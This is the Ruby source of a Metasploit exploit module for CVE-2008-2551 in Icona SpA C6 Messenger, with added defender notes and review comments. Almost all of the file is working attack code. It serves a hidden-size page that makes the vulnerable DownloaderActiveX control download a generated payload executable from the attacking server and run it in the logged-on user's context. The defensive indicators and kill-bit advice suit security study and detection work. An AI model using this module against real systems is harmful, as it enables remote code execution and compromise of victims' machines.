rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit browser module for CVE-2008-2551 (Icona SpA C6 Messenger 1.0.0.1).
#
# The module runs an HTTP server that answers two kinds of request:
#   * a landing page that instantiates the DownloaderActiveX control and sets
#     its download URL and post-download action, and
#   * the follow-up request for the executable that the control downloads.
#
# Defender notes (derived from the code below):
#   * The landing page is recognisable by an <object> tag carrying the
#     DownloaderActiveX CLSID together with "propDownloadUrl" and
#     "propPostDownloadAction" = "run".
#   * The download of the executable is made with a User-Agent containing
#     "File Session" and is answered as application/octet-stream.
#   * The root cause is the control itself accepting an arbitrary URL and
#     running the result; removing the control or blocking its instantiation
#     in Internet Explorer (for example with a kill bit for this CLSID)
#     removes the exposure.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  # Registers the module metadata (name, references, payload constraints,
  # target list) with the framework.
  #
  # @param info [Hash] metadata passed in by the framework, merged through
  #   update_info with the values declared here
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute',
        'Description' => %q{
          This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The
          vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The
          insecure control can be abused to download and execute arbitrary files in the context of
          the currently logged-on user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Unknown', # Nine:Situations:Group::SnoopyAssault, vulnerability discovery and exploit
          'juan vazquez' # metasploit module
        ],
        # Public identifiers for the flaw; useful for matching advisories and
        # signature coverage.
        'References' => [
          [ 'CVE', '2008-2551' ],
          [ 'OSVDB', '45960' ],
          [ 'BID', '29519' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'none',
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
        },
        'Payload' => {
          'Space' => 2048,
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Automatic', {} ],
        ],
        'DisclosureDate' => '2008-06-03',
        'DefaultTarget' => 0,
        'Privileged' => false,
        # Reliability, stability and side effects have not been characterised
        # for this module.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Always returns false.
  # NOTE(review): presumably this opts the module out of automatic module
  # selection -- confirm against the framework's use of autofilter.
  def autofilter
    false
  end

  # Delegates to use_zlib.
  # NOTE(review): use_zlib is defined outside this file; presumably it
  # declares a zlib dependency -- confirm in the framework mixin.
  def check_dependencies
    use_zlib
  end

  # Handles every HTTP request that reaches the module's server.
  #
  # Requests whose User-Agent matches neither an "MSIE x.y" string nor
  # "File Session" are rejected with an error message and no response.
  # Requests whose URI contains the per-run token get the generated
  # executable; all other accepted requests get the landing page.
  #
  # @param cli the client connection object supplied by the HTTP server mixin
  # @param request the parsed HTTP request (headers and uri are read here)
  def on_request_uri(cli, request)
    # Only IEs are potential targets.
    # "File Session" is the agent seen when the ActiveX control itself
    # requests the EXE.
    user_agent = request.headers['User-Agent']
    unless user_agent =~ /MSIE \d\.\d|File Session/
      print_error("Target not supported: #{user_agent}")
      return
    end

    # Base URL under which the executable is served; @payload_rand is the
    # random token chosen in #exploit.
    payload_url = "#{get_uri(cli)}/#{@payload_rand}"

    # Second stage: the request path carries the token, so this is the
    # control fetching the file named in propDownloadUrl.
    if request.uri =~ /#{@payload_rand}/
      regenerated = regenerate_payload(cli)
      return if regenerated.nil?

      exe_bytes = generate_payload_exe({ code: regenerated.encoded })
      print_status('Sending EXE payload')
      send_response(cli, exe_bytes, { 'Content-Type' => 'application/octet-stream' })
      return
    end

    # First stage: a random 1-5 letter file name for the .exe URL.
    exe_name = rand_text_alpha(rand(5) + 1)

    # Landing page. The security-relevant parameters are propDownloadUrl
    # (where the control fetches from) and propPostDownloadAction ("run"):
    # the control performs both without further validation, which is the
    # vulnerability described in the module metadata.
    content = %Q|
    <html>
    <object id="DownloaderActiveX1" width="0" height="0" classid="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" codebase="DownloaderActiveX.cab#Version=1,0,0,1">
    <param name="propProgressBackground" value="#bccee8">
    <param name="propTextBackground" value="#f7f8fc">
    <param name="propBarColor" value="#df0203">
    <param name="propTextColor" value="#000000">
    <param name="propWidth" value="0">
    <param name="propHeight" value="0">
    <param name="propDownloadUrl" value="#{payload_url}/#{exe_name}.exe">
    <param name="propPostDownloadAction" value="run">
    <param name="propInstallCompleteUrl" value="">
    <param name="propBrowserRedirectUrl" value="">
    <param name="propVerbose" value="0">
    <param name="propInterrupt" value="0">
    </OBJECT>
    </html>
    |

    print_status("Sending #{name}")

    send_response_html(cli, content)

    handler(cli)
  end

  # Picks the per-run URL token (5-9 random letters) used to tell the
  # executable request apart from the landing-page request, then hands
  # control to the parent implementation.
  def exploit
    token_length = rand(5) + 5
    @payload_rand = rand_text_alpha(token_length)
    super
  end
end